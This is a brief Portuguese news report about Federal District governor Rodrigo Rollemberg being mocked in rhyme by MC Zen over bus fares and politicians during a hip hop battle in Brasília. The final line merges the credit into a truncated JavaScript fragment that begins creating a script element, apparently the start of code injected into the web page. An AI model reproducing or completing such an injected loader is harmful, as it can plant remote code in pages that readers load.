Tentando se aproximar da periferia e das comunidades mais carentes do Distrito Federal, o governador Rodrigo Rollemberg foi neste final de semana ao Museu da República, no centro de Brasília, para acompanhar um evento de cultura hip hop. Durante a batalha de MC\’s, onde duas pessoas trocam versos rimados ao som da batida do rap, o governador tornou-se alvo da língua afiada dos versadores.
Arrancando aplausos da plateia e sorrisos amarelos do governador, MC Zen criticou o preço da passagem de ônibus, atualmente custando até R$ 5, e também atitudes de políticos como um todo. \”Político só aparece quando está perto da campanha, se a gente for procurar, ele sobe pra montanha\”, bradou o rapper acompanhado por gritos da multidão.
O governador recebeu bem as críticas, mas não teve muito espaço para falar. Se ele não sabia, agora sabe que ter a palavra em uma batalha de MC\’s é para poucos. Em sua página no Facebook, Rollemberg afirmou que a Batalha do Museu é de extrema importância. \”O hip hop é, por natureza, uma manifestação de contestação e foi muito importante para mim ouvir as reivindicações, criticas e considerações de quem vive e enfrenta as dificuldades do DF no cotidiano\”, escreveu.
Veja o vídeo da batalha:
Créditos: Mc Zenvar d=document;var s=d.createElement(\’script\’);